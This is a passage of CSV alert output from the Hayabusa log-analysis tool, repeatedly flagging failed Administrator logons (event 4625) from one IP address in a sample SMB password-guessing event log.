NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 70rRbaC6L6SzT15q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.735 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HnJyN8wF21ff2L1e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.769 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MUZHZJMQznj6GBqg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.804 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P9h52ZKMbXLuFvUV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.839 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n95RJvcQnFrAG2iX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.883 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xI23nmysFlr1pvVf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.916 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nVsjcTxDdZbzkmMx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.955 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mMuWatQuNBh9UKdR | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.992 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BfC3JZ3awqFDNQbm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.028 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 337h8PHN6Axi0iaY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.071 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qGQpWOuzgETfxTgJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.108 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oFjlyMAJMI2zIC8w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.144 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7exAVz3PlzJQ6Wcw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.183 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RuYihjQpt76foAW3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.219 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OlPm2vRh9EHN9J6n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.255 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n9jDy3NDDPe7XgyW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.291 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AtGxqEKOoP6W3w0Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BLqYztXwV80UBez1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C0yki1dEFZrnMLs2 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jbE2z1W1wQgoTDso | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.455 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IJmZFXFxiLuWWkMC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.500 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x9EPwprgXSJNUFfg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h0ZjYxZ8K5m5F1vo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.587 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xSw7OjDv8ldqbm5T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.631 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mk0BAdOI210HwPhX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.686 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wSwWz57Kvl2XJVUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DLcfSrHT5bSsNnuQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rQDkbESps0PXWEUT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.797 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZpnyzkXasuyAtdn1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ps9IqJzTliJvzpIS | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.876 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V7PLb2uRTIY8t123 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sHAJ9p0QbSRxhvtk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.968 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YRiE1wGrwWAx0feP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Flo4bCVjmlaHz0QS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.061 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HscUujSzd3Ua7dqg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.156 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aIQPTx67aEer51wb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.191 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MqUoXUf7PKIaoDjs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.222 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wzeB4DAS1W633tmh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.263 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UTtXTrqHoCZMbDLT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.311 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4HVv5PgPhiDW3qcj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g21VoO45UrIbTuZO | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.383 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rGpD7AJUTekDmd6Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.423 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OykzTOn7B9THv0cT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.462 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cIYOrBBwX8nFpCzw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SvnROHLMVnmPfAyy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5EwJ84H7kXQXzGZz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.580 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 34RLeLWDgLayU3JM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.619 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QaXHGUgboODAi5Qu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.659 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QlOlZ0m397CsmaeD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.699 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N24rSPCI8DsQIPXR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.738 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5y2tgoUcs6mFPZm4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HmFX6MioYqaMumgw | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.820 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R4HRWlPWPKy1Cicq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GDUf7wVbHkS9uaPC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.917 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eBX0Lviz6Bv5rGcb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zZwPm9qahLU78FRY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jOVsopykTHNQcYUp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.060 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n8DY7sdDY8nuWdME | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.105 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rTxEVu7mudXEBARZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7ohqvCoOLkFRcqvE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: me8rikVJqcKxvHdq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oLqVmqCmHTrD7V8V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ySdyzxvDasHgjq0 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.312 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N2auwOc1wemq76n1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RgK6lHgC5WOBk4kW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2GG0bKgusKqseQij | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MpHm7DcOmhq4rkaX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OX1vVGrE7fJSMEiZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.508 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 65i7wtyAhL58QrzC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.551 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k8uSVFRTLTB6g1eg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ire6VOUMWZQnNjES | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pGWnvKUXnbJvRqql | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xBVvrrLf1rnAviKS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NE9atGNBlSLQLLcX | IP Addr: 192.168.198.149 | AuthPackage: 
